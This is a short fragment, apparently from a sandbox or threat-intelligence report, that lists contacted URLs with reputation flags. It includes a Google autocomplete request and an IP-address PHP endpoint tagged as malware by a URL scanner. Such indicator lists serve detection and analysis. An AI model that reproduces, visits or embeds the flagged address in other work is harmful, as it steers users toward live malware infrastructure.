        https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw false
          		high
          http://185.231.69.191/f190e2808a5419c3.php true
          • Avira URL Cloud: malware
          		 unknown